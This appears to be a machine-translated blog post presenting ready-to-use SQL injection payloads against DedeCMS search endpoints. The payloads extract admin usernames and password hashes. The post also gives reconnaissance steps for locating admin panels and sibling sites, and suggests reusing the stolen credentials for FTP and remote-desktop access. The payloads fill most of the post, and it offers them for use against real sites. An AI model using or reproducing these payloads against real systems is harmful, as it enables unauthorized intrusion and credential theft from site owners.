first:
Inject exp
Sometimes the/plus/directory is changed to the/plugins directory

/plugins/search.php? keyword=as&typeArr[111%3D@`\’`)
+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,
21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+
from+`% 23@__admin `%23@`\’`+]=a

/plus/search.php? keyword=as&typeArr[111%3D@`\’`)
+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,
21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+
from+`% 23@__admin `%23@`\’`+]=a

/plus/search.php? keyword=as&typeArr[111%3D@`\’`)+and+(SELECT+1+FROM+
(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT
(0x7c,userid,0x7c,pwd)+from+`% 23@__admin `+limit+0,1),1,62)))
a+from+information_schema.tables+group+by+a)b)%23@`\’`+]=a

/plus/search.php? keyword=as&typeArr[ uNion ]=a

/robots.txt

/data/admin/ver.txt

/data/mysql_error_trace.inc

The first one is here/data/mysql_error_trace. inc

The second domain name is used as the background or the domain name is deformed

The third is to ping the domain name to get the IP address

http://www.bing.com/
Search ip: 127.0.0.1 php, and you may get the background and other side note stations. Most of the side note stations of dedecms are also dedecms

The fourth view robots.txt
http://www.dedecms.com/robots.txt Check the background address of the social worker target station from the side note station dedecms

The fifth injection exp gets the account, goes to social worker ftp and 3389 password

At least I have succeeded today

Welcome to share experience with friends, and welcome to summarize and supplement

Original article reprint please specify: reprint from Seven Travelers Blog

Fixed link of this article: https://www.qxzxp.com/2740.html